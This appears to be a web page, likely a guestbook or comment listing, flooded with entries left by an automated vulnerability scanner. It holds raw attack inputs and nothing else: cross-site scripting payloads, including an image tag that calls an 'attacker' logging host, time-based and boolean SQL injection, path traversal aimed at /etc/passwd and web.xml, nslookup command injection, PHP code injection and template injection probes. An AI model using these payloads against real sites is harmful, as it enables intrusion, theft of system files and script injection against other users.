e [../../../../../../../../../../../../../../../proc/version] 2020-10-28 21:45:38

1

e [116.113.93.82] 2020-10-28 21:45:38

response.write(9881713*9742888)

e [../../../../../../../../../../etc/passwd] 2020-10-28 21:45:37

1

e [-1' OR 2+541-541-1=0+0+0+1 -- ] 2020-10-28 21:45:37

1

e [116.113.93.82] 2020-10-28 21:45:36

0NWr6ckS

e [-1 OR 2+631-631-1=0+0+0+1] 2020-10-28 21:45:36

1

e [&nslookup 8e4LaxqO&'\"`0&nslookup 8e4LaxqO&`'] 2020-10-28 21:45:35

1

e [-1 OR 2+270-270-1=0+0+0+1 -- ] 2020-10-28 21:45:34

1

e [$(nslookup 4l22EODZ)] 2020-10-28 21:45:34

1

e [lqrcUJh9] 2020-10-28 21:45:34

1

e [NNUlD9V0] 2020-10-28 21:45:34

1

e [set|set&set] 2020-10-28 21:45:33

1

e ["+response.write(9526418*9286528)+"] 2020-10-28 21:45:33

1

e [116.113.93.82] 2020-10-28 21:45:33

1

e ['+response.write(9526418*9286528)+'] 2020-10-28 21:45:33

1

e [116.113.93.82] 2020-10-28 21:45:32

1

e [response.write(9526418*9286528)] 2020-10-28 21:45:32

1

e [116.113.93.82] 2020-10-28 21:44:33

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:09:13

1

GRLpGpAG"><script>uITi(9857)</script> [116.113.93.82] 2020-10-28 20:09:10

1

GRLpGpAG"sTYLe='acu:Expre/**/SSion(uITi(9175))'bad=" [116.113.93.82] 2020-10-28 20:09:08

1

[116.113.93.82] 2020-10-28 20:09:05

1

%47%52%4C%70%47%70%41%47%22%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%75%49%54%69%28%39%37%33%32%29%22 [116.113.93.82] 2020-10-28 20:09:03

1

GRLpGpAG\u0022onmouseover=uITi(9270)\u0022 [116.113.93.82] 2020-10-28 20:09:01

1

GRLpGpAG" 1YOj=uITi([!+!]) FI2=" [116.113.93.82] 2020-10-28 20:08:58

1

GRLpGpAG"onmouseover=uITi(9241)" [116.113.93.82] 2020-10-28 20:08:56

1

GRLpGpAG<sYWHUY< [116.113.93.82] 2020-10-28 20:08:54

1

GRLpGpAG<img sRc='http://attacker-9304/log.php? [116.113.93.82] 2020-10-28 20:08:52

1

GRLpGpAG<fO8H9y x=9509> [116.113.93.82] 2020-10-28 20:08:50

1

GRLpGpAG<ifRAme sRc=9655.com></IfRamE> [116.113.93.82] 2020-10-28 20:08:48

1

GRLpGpAG<WB5WFV>3J0U0[!+!]</WB5WFV> [116.113.93.82] 2020-10-28 20:08:45

1

GRLpGpAGns62X <ScRiPt >uITi(9581)</ScRiPt> [116.113.93.82] 2020-10-28 20:08:44

1

GRLpGpAG<% contenteditable onresize=uITi(9711)> [116.113.93.82] 2020-10-28 20:08:41

1

GRLpGpAG}body{acu:Expre/**/SSion(uITi(9860))} [116.113.93.82] 2020-10-28 20:08:39

1

GRLpGpAG<img<!-- --> src=x onerror=alert(9749);//><!-- --> [116.113.93.82] 2020-10-28 20:08:36

1

[url=http://www.vulnweb.com][/url] [116.113.93.82] 2020-10-28 20:08:34

1

<a HrEF=jaVaScRiPT:> [116.113.93.82] 2020-10-28 20:08:32

1

<a HrEF=http://www.vulnweb.com></a> [116.113.93.82] 2020-10-28 20:08:30

1

GRLpGpAG<input autofocus onfocus=uITi(9956)> [116.113.93.82] 2020-10-28 20:08:27

1

[116.113.93.82] 2020-10-28 20:08:25

1

GRLpGpAG<ScRiPt>uITi(9105)</sCripT> [116.113.93.82] 2020-10-28 20:08:24

1

GRLpGpAG\u003CScRiPt\uITi(9653)\u003C/sCripT\u003E [116.113.93.82] 2020-10-28 20:08:21

1

%47%52%4C%70%47%70%41%47%3C%53%63%52%69%50%74%20%3E%75%49%54%69%289597%29%3C%2F%73%43%72%69%70%54%3E [116.113.93.82] 2020-10-28 20:08:19

1

GRLpGpAG<img/src=">" onerror=alert(9901)> [116.113.93.82] 2020-10-28 20:08:16

1

GRLpGpAG<img src=xyz OnErRor=uITi(9230)> [116.113.93.82] 2020-10-28 20:08:15

1

GRLpGpAG<img src=//testasp.vulnweb.com/t/dot.gif onload=uITi(9323)> [116.113.93.82] 2020-10-28 20:08:12

1

GRLpGpAG<body onload=uITi(9437)> [116.113.93.82] 2020-10-28 20:08:10

1

GRLpGpAG<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9767'> [116.113.93.82] 2020-10-28 20:08:07

1

GRLpGpAG<isindex type=image src=1 onerror=uITi(9173)> [116.113.93.82] 2020-10-28 20:08:05

1

GRLpGpAG<svg [116.113.93.82] 2020-10-28 20:08:03

1

GRLpGpAG<video><source onerror="javascript:uITi(9499)"> [116.113.93.82] 2020-10-28 20:08:01

1

GRLpGpAG<ScRiPt >uITi(9303)</ScRiPt> [116.113.93.82] 2020-10-28 20:07:58

1

GRLpGpAG<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9683></ScRiPt> [116.113.93.82] 2020-10-28 20:07:56

1

GRLpGpAG<ScRiPt >uITi(9327)</ScRiPt> [116.113.93.82] 2020-10-28 20:07:54

1

GRLpGpAG<ScR<ScRiPt>IpT>uITi(9877)</sCr<ScRiPt>IpT> [116.113.93.82] 2020-10-28 20:07:51

1

GRLpGpAG<script>uITi(9731)</script> [116.113.93.82] 2020-10-28 20:07:49

1

GRLpGpAG<WOPOR5>MW1MH[!+!]</WOPOR5> [116.113.93.82] 2020-10-28 20:07:46

1

GRLpGpAG<ScRiPt >uITi(9785)</ScRiPt> [116.113.93.82] 2020-10-28 20:07:44

1

{{10000064*9999533}} [116.113.93.82] 2020-10-28 20:07:42

1

acux3767 [116.113.93.82] 2020-10-28 20:07:39

1

acu5501<s1﹥s2ʺs3ʹuca5501 [116.113.93.82] 2020-10-28 20:07:36

1

{{9999704*9999209}} [116.113.93.82] 2020-10-28 20:07:35

1

acux6996 [116.113.93.82] 2020-10-28 20:07:32

1

acu9433<s1﹥s2ʺs3ʹuca9433 [116.113.93.82] 2020-10-28 20:07:30

1

GRLpGpAG9883482 [116.113.93.82] 2020-10-28 20:07:27

1

'"()&%<acx><ScRiPt >uITi(9403)</ScRiPt> [116.113.93.82] 2020-10-28 20:07:25

1

GRLpGpAG'"()&%<acx><ScRiPt >uITi(9262)</ScRiPt> [116.113.93.82] 2020-10-28 20:07:23

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:07:20

1<Ko4gJ7<

GRLpGpAG [116.113.93.82] 2020-10-28 20:07:18

1<img sRc='http://attacker-9626/log.php?

GRLpGpAG [116.113.93.82] 2020-10-28 20:07:15

1<lz6hnJ x=9004>

GRLpGpAG [116.113.93.82] 2020-10-28 20:07:13

1<ifRAme sRc=9731.com></IfRamE>

GRLpGpAG [116.113.93.82] 2020-10-28 20:07:11

1<WCNOLM>WYUDO[!+!]</WCNOLM>

GRLpGpAG [116.113.93.82] 2020-10-28 20:07:08

1nm9LT <ScRiPt >uITi(9644)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 20:07:06

1<% contenteditable onresize=uITi(9045)>

GRLpGpAG [116.113.93.82] 2020-10-28 20:07:04

1}body{acu:Expre/**/SSion(uITi(9056))}

GRLpGpAG [116.113.93.82] 2020-10-28 20:07:02

1<img<!-- --> src=x onerror=alert(9694);//><!-- -->

GRLpGpAG [116.113.93.82] 2020-10-28 20:07:00

[url=http://www.vulnweb.com][/url]

GRLpGpAG [116.113.93.82] 2020-10-28 20:06:57

<a HrEF=jaVaScRiPT:>

GRLpGpAG [116.113.93.82] 2020-10-28 20:06:55

<a HrEF=http://www.vulnweb.com></a>

GRLpGpAG [116.113.93.82] 2020-10-28 20:06:53

1<input autofocus onfocus=uITi(9046)>

GRLpGpAG [116.113.93.82] 2020-10-28 20:06:51

GRLpGpAG [116.113.93.82] 2020-10-28 20:06:48

1<ScRiPt>uITi(9808)</sCripT>

GRLpGpAG [116.113.93.82] 2020-10-28 20:06:46

1\u003CScRiPt\uITi(9059)\u003C/sCripT\u003E

GRLpGpAG [116.113.93.82] 2020-10-28 20:06:44

%31%3C%53%63%52%69%50%74%20%3E%75%49%54%69%289565%29%3C%2F%73%43%72%69%70%54%3E

GRLpGpAG [116.113.93.82] 2020-10-28 20:06:42

1<img/src=">" onerror=alert(9449)>

GRLpGpAG [116.113.93.82] 2020-10-28 20:06:39

1<img src=xyz OnErRor=uITi(9629)>

GRLpGpAG [116.113.93.82] 2020-10-28 20:06:37

1<img src=//testasp.vulnweb.com/t/dot.gif onload=uITi(9044)>

GRLpGpAG [116.113.93.82] 2020-10-28 20:06:35

1<body onload=uITi(9844)>

GRLpGpAG [116.113.93.82] 2020-10-28 20:06:33

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9670'>

GRLpGpAG [116.113.93.82] 2020-10-28 20:06:30

1<isindex type=image src=1 onerror=uITi(9655)>

GRLpGpAG [116.113.93.82] 2020-10-28 20:06:28

1<svg

GRLpGpAG [116.113.93.82] 2020-10-28 20:06:25

1<video><source onerror="javascript:uITi(9848)">

GRLpGpAG [116.113.93.82] 2020-10-28 20:06:23

1<ScRiPt >uITi(9040)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 20:06:20

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9160></ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 20:06:18

1<ScRiPt >uITi(9335)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 20:06:16

1<ScR<ScRiPt>IpT>uITi(9875)</sCr<ScRiPt>IpT>

GRLpGpAG [116.113.93.82] 2020-10-28 20:06:14

1<script>uITi(9325)</script>

GRLpGpAG [116.113.93.82] 2020-10-28 20:06:11

1<WUD2CI>MPC0D[!+!]</WUD2CI>

GRLpGpAG [116.113.93.82] 2020-10-28 20:06:09

1<ScRiPt >uITi(9691)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 20:06:07

{{9999805*10000291}}

GRLpGpAG [116.113.93.82] 2020-10-28 20:06:05

acux6415

GRLpGpAG [116.113.93.82] 2020-10-28 20:06:02

acu1419<s1﹥s2ʺs3ʹuca1419

GRLpGpAG [116.113.93.82] 2020-10-28 20:06:00

19375238

GRLpGpAG [116.113.93.82] 2020-10-28 20:05:42

'"()&%<acx><ScRiPt >uITi(9290)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 20:05:40

1'"()&%<acx><ScRiPt >uITi(9045)</ScRiPt>

GRLpGpAG [116.113.93.82<OV8Njm<] 2020-10-28 20:05:34

1

GRLpGpAG [116.113.93.82<img sRc='http://attacker-9130/log.php?] 2020-10-28 20:05:32

1

GRLpGpAG [116.113.93.82<izUfMN x=9982>] 2020-10-28 20:05:29

1

GRLpGpAG [116.113.93.82<ifRAme sRc=9746.com></IfRamE>] 2020-10-28 20:05:27

1

GRLpGpAG [116.113.93.82<WMUED2>F1PBJ[!+!]</WMUED2>] 2020-10-28 20:05:25

1

GRLpGpAG [116.113.93.82CLDmg <ScRiPt >uITi(9058)</ScRiPt>] 2020-10-28 20:05:23

1

GRLpGpAG [116.113.93.82<% contenteditable onresize=uITi(9515)>] 2020-10-28 20:05:20

1

GRLpGpAG [116.113.93.82}body{acu:Expre/**/SSion(uITi(9721))}] 2020-10-28 20:05:18

1

GRLpGpAG [116.113.93.82<img<!-- --> src=x onerror=alert(9152);//><!-- -->] 2020-10-28 20:05:16

1

GRLpGpAG [[url=http://www.vulnweb.com][/url]] 2020-10-28 20:05:14

1

GRLpGpAG [<a HrEF=jaVaScRiPT:>] 2020-10-28 20:05:12

1

GRLpGpAG [<a HrEF=http://www.vulnweb.com></a>] 2020-10-28 20:05:10

1

GRLpGpAG [116.113.93.82<input autofocus onfocus=uITi(9187)>] 2020-10-28 20:05:07

1

GRLpGpAG [] 2020-10-28 20:05:05

1

GRLpGpAG [116.113.93.82<ScRiPt>uITi(9747)</sCripT>] 2020-10-28 20:05:04

1

GRLpGpAG [116.113.93.82\u003CScRiPt\uITi(9809)\u003C/sCripT\u003E] 2020-10-28 20:05:01

1

GRLpGpAG [%31%31%36%2E%31%31%33%2E%39%33%2E%38%32%3C%53%63%52%69%50%74%20%3E%75%49%54%69%289762%29%3C%2F%73%43%72%69%70%54%3E] 2020-10-28 20:04:59

1

GRLpGpAG [116.113.93.82<img/src=">" onerror=alert(9219)>] 2020-10-28 20:04:56

1

GRLpGpAG [116.113.93.82<img src=xyz OnErRor=uITi(9882)>] 2020-10-28 20:04:55

1

WEB-INF\web.xml [116.113.93.82] 2020-10-28 20:04:54

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:54

1

WEB-INF/web.xml [116.113.93.82] 2020-10-28 20:04:53

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:53

1

GRLpGpAG [116.113.93.82<img src=//testasp.vulnweb.com/t/dot.gif onload=uITi(9090)>] 2020-10-28 20:04:53

1

/WEB-INF/web.xml [116.113.93.82] 2020-10-28 20:04:52

1

TAgg7Xp1'));select pg_sleep(9); -- [116.113.93.82] 2020-10-28 20:04:52

1

/\../\../\../\../\../\../\../etc/passwd [116.113.93.82] 2020-10-28 20:04:51

1

OsTB04Sp');select pg_sleep(9); -- [116.113.93.82] 2020-10-28 20:04:51

1

GRLpGpAG [116.113.93.82<body onload=uITi(9956)>] 2020-10-28 20:04:50

1

file:///etc/passwd [116.113.93.82] 2020-10-28 20:04:50

1

WI7WyKeT';select pg_sleep(9); -- [116.113.93.82] 2020-10-28 20:04:50

1

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././ [116.113.93.82] 2020-10-28 20:04:49

1

xyobGAoT'; waitfor delay '0:0:6' -- [116.113.93.82] 2020-10-28 20:04:49

1

GRLpGpAG [116.113.93.82<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9472'>] 2020-10-28 20:04:48

1

.. [116.113.93.82] 2020-10-28 20:04:48

1

1 waitfor delay '0:0:6' -- [116.113.93.82] 2020-10-28 20:04:47

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd [116.113.93.82] 2020-10-28 20:04:46

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/ [116.113.93.82] 2020-10-28 20:04:46

1

GRLpGpAG [116.113.93.82<isindex type=image src=1 onerror=uITi(9191)>] 2020-10-28 20:04:46

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd [116.113.93.82] 2020-10-28 20:04:45

1

0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z [116.113.93.82] 2020-10-28 20:04:45

1

/.././.././.././.././.././.././.././../etc/./passwd%00 [116.113.93.82] 2020-10-28 20:04:45

1

0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z [116.113.93.82] 2020-10-28 20:04:44

1

%2fetc%2fpasswd [116.113.93.82] 2020-10-28 20:04:44

1

GRLpGpAG [116.113.93.82<svg ] 2020-10-28 20:04:44

1

if(now()=sysdate(),sleep(3),0) [116.113.93.82] 2020-10-28 20:04:44

1

/etc/passwd [116.113.93.82] 2020-10-28 20:04:43

1

-1" OR 2+71-71-1=0+0+0+1 -- [116.113.93.82] 2020-10-28 20:04:42

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd [116.113.93.82] 2020-10-28 20:04:42

1

GRLpGpAG [116.113.93.82<video><source onerror="javascript:uITi(9661)">] 2020-10-28 20:04:42

1

-1' OR 2+370-370-1=0+0+0+1 or 'YuXyQonh'=' [116.113.93.82] 2020-10-28 20:04:41

1

/../..//../..//../..//../..//../..//etc/passwd.jpg [116.113.93.82] 2020-10-28 20:04:41

1

-1' OR 2+316-316-1=0+0+0+1 -- [116.113.93.82] 2020-10-28 20:04:40

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg [116.113.93.82] 2020-10-28 20:04:40

1

GRLpGpAG [116.113.93.82<ScRiPt >uITi(9173)</ScRiPt>] 2020-10-28 20:04:40

1

-1 OR 2+723-723-1=0+0+0+1 [116.113.93.82] 2020-10-28 20:04:39

1

../../../../../../../../../../etc/passwd.jpg [116.113.93.82] 2020-10-28 20:04:39

1

-1 OR 2+922-922-1=0+0+0+1 -- [116.113.93.82] 2020-10-28 20:04:38

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd [116.113.93.82] 2020-10-28 20:04:37

1

GRLpGpAG [116.113.93.82<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9937></ScRiPt>] 2020-10-28 20:04:37

1

2I3FX0n0 [116.113.93.82] 2020-10-28 20:04:37

1

../../../../../../../../../../../../../../../proc/version [116.113.93.82] 2020-10-28 20:04:36

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:35

1

../../../../../../../../../../etc/passwd [116.113.93.82] 2020-10-28 20:04:35

1

GRLpGpAG [116.113.93.82<ScRiPt >uITi(9585)</ScRiPt>] 2020-10-28 20:04:35

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:35

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:35

WEB-INF\web.xml

[116.113.93.82] 2020-10-28 20:04:34

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:34

w4wZojng'));select pg_sleep(9); --

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:34

WEB-INF/web.xml

GRLpGpAG [116.113.93.82<ScR<ScRiPt>IpT>uITi(9710)</sCr<ScRiPt>IpT>] 2020-10-28 20:04:34

1

[116.113.93.82] 2020-10-28 20:04:33

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:33

bGDUw3gB');select pg_sleep(9); --

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:33

/WEB-INF/web.xml

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:32

E173ZtWu';select pg_sleep(9); --

JyI= [116.113.93.82] 2020-10-28 20:04:32

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:32

/\../\../\../\../\../\../\../etc/passwd

@@gevXP [116.113.93.82] 2020-10-28 20:04:31

1

GRLpGpAG [116.113.93.82<script>uITi(9604)</script>] 2020-10-28 20:04:31

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:31

-1));select pg_sleep(9); --

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:31

file:///etc/passwd

1 [116.113.93.82] 2020-10-28 20:04:30

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:30

-1);select pg_sleep(6); --

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:30

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

\ [116.113.93.82] 2020-10-28 20:04:29

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:29

-1;select pg_sleep(6); --

GRLpGpAG [116.113.93.82<WQP3W1>UQAZP[!+!]</WQP3W1>] 2020-10-28 20:04:29

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:29

..

1'" [116.113.93.82] 2020-10-28 20:04:28

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:28

mnf3JWvr'; waitfor delay '0:0:6' --

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:28

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:27

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:27

1 waitfor delay '0:0:3' --

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:27

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

GRLpGpAG [116.113.93.82<ScRiPt >uITi(9124)</ScRiPt>] 2020-10-28 20:04:26

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:26

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:26

/.././.././.././.././.././.././.././../etc/./passwd%00

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:25

-1); waitfor delay '0:0:3' --

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:25

JyI=

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:25

%2fetc%2fpasswd

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:25

-1; waitfor delay '0:0:3' --

GRLpGpAG [{{9999930*10000017}}] 2020-10-28 20:04:25

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:24

@@ff0d6

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:24

/etc/passwd

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:24

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:24

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:23

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:23

0"XOR(if(now()=sysdate(),sleep(9),0))XOR"Z

GRLpGpAG [acux3624] 2020-10-28 20:04:23

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:23

\

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:22

0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:22

/../..//../..//../..//../..//../..//etc/passwd.jpg

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:22

1'"

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:21

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:21

if(now()=sysdate(),sleep(9),0)

<!-- [116.113.93.82] 2020-10-28 20:04:21

1

GRLpGpAG [acu7901<s1﹥s2ʺs3ʹuca7901] 2020-10-28 20:04:20

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:20

../../../../../../../../../../etc/passwd.jpg

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:20

-1" OR 2+865-865-1=0+0+0+1 --

'" [116.113.93.82] 2020-10-28 20:04:20

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:19

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:19

-1' OR 2+511-511-1=0+0+0+1 or 'LNcFbu00'='

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:18

<!--

GRLpGpAG [116.113.93.829118681] 2020-10-28 20:04:18

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:18

../../../../../../../../../../../../../../../proc/version

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:18

-1' OR 2+914-914-1=0+0+0+1 --

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:17

'"

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:17

../../../../../../../../../../etc/passwd

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:17

-1 OR 2+724-724-1=0+0+0+1

GRLpGpAG ['"()&%<acx><ScRiPt >uITi(9393)</ScRiPt>] 2020-10-28 20:04:16

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:16

-1 OR 2+717-717-1=0+0+0+1 --

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:15

S4C4sKYw

GRLpGpAG [<!--] 2020-10-28 20:04:15

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:14

1

GRLpGpAG [116.113.93.82'"()&%<acx><ScRiPt >uITi(9976)</ScRiPt>] 2020-10-28 20:04:14

1

GRLpGpAG ['"] 2020-10-28 20:04:14

1

GRLpGpAG [] 2020-10-28 20:04:14

1

/www.vulnweb.com [116.113.93.82] 2020-10-28 20:04:14

1

))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) [116.113.93.82] 2020-10-28 20:04:14

1

create/. [116.113.93.82] 2020-10-28 20:04:13

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:13

1

${@print(md5(acunetix_wvs_security_test))}\ [116.113.93.82] 2020-10-28 20:04:13

1

GRLpGpAG [] 2020-10-28 20:04:13

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:13

/www.vulnweb.com

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:13

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

create [116.113.93.82] 2020-10-28 20:04:12

1

${@print(md5(acunetix_wvs_security_test))} [116.113.93.82] 2020-10-28 20:04:12

1

GRLpGpAG [JyI=] 2020-10-28 20:04:12

1

create [116.113.93.82] 2020-10-28 20:04:11

1

";print(md5(acunetix_wvs_security_test));$a=" [116.113.93.82] 2020-10-28 20:04:11

1

GRLpGpAG [/www.vulnweb.com] 2020-10-28 20:04:11

1

GRLpGpAG [@@NS0f0] 2020-10-28 20:04:11

1

GRLpGpAG [)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))] 2020-10-28 20:04:10

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:10

create/.

';print(md5(acunetix_wvs_security_test));$a=' [116.113.93.82] 2020-10-28 20:04:10

1

GRLpGpAG [1] 2020-10-28 20:04:10

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:09

create

;print(md5(acunetix_wvs_security_test)); [116.113.93.82] 2020-10-28 20:04:08

1

GRLpGpAG [\] 2020-10-28 20:04:08

1

testasp.vulnweb.com [116.113.93.82] 2020-10-28 20:04:08

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:07

create

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:07

${@print(md5(acunetix_wvs_security_test))}\

http://hitR91u2tYbv0.bxss.me/ [116.113.93.82] 2020-10-28 20:04:07

1

testasp.vulnweb.com/t/xss.html?%00 [116.113.93.82] 2020-10-28 20:04:07

1

GRLpGpAG [1'"] 2020-10-28 20:04:07

1

http://testasp.vulnweb.com/t/fit.txt?.jpg [116.113.93.82] 2020-10-28 20:04:07

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:06

${@print(md5(acunetix_wvs_security_test))}

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:06

http://hitZe0YOUSJ2h.bxss.me/

HttP://testasp.vulnweb.com/t/xss.html?%00 [116.113.93.82] 2020-10-28 20:04:06

1

Http://testasp.vulnweb.com/t/fit.txt [116.113.93.82] 2020-10-28 20:04:05

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:05

";print(md5(acunetix_wvs_security_test));$a="

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:05

testasp.vulnweb.com/t/xss.html?%00

1some_inexistent_file_with_long_name.jpg [116.113.93.82] 2020-10-28 20:04:05

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:05

';print(md5(acunetix_wvs_security_test));$a='

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:04

HttP://testasp.vulnweb.com/t/xss.html?%00

GRLpGpAG [create/.] 2020-10-28 20:04:04

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg [116.113.93.82] 2020-10-28 20:04:04

1

GRLpGpAG [http://hitFgiOczamUM.bxss.me/] 2020-10-28 20:04:04

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:04

;print(md5(acunetix_wvs_security_test));

^(#$!@#$)(()))****** [116.113.93.82] 2020-10-28 20:04:04

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:03

testasp.vulnweb.com

